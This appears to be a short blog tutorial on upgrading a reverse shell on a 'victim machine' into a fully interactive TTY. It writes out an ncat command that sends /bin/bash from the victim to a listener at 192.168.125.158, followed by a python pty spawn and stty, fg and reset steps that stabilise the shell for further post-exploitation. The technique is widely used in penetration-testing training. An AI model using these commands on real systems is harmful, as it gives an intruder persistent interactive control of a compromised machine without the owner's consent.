This blog will show you how to upgrade a reverse shell to a full feature TTY shell and also use Vi editor in a low privilege shell.
Step 1: Grab a reverse shell.
Victim Machine : ncat -nv 192.168.125.158 -e /bin/bash
Kali Machine : nc -lvp 443
Step 2 : Break the jail Shell
Command : python -c 'import pty; pty.spawn("/bin/bash")'
Step 3: Now we need to background the current shell by CTRL + Z.
Step 4: We need some information of our current terminal to match the background shell.
# echo $TERM
# stty -a
The information needed is the TERM type ("xterm-256color") and the size of the current TTY ("rows 24; columns 80")
Step 5: As we have the shell in the background, we can now set the current STTY to raw and echo the input characters.
# stty raw -echo
The terminal looks weird and any thing type won't be seen but will be processed.
Step 6: To bring the shell to foreground we can type "fg". It will re-open the reverse shell but formatting will be off.
And then reinitialize the terminal with reset.
# fg
# reset
Press enter after 'fg' and then after 'reset'. You will get the shell terminal back.
Step 7: As formatting was set as off. We need to now match the current shell to our Kali terminal with the information gathered in step 4. The below mentioned commands need to be entered :
$ export SHELL=bash
$ export TERM=xterm256-color
$ stty rows 24 columns 80
Now we have a full featured TTY shell which features the Tab , auto-complete and we can use Vi editor in low privilege shell.
No comments:
Post a Comment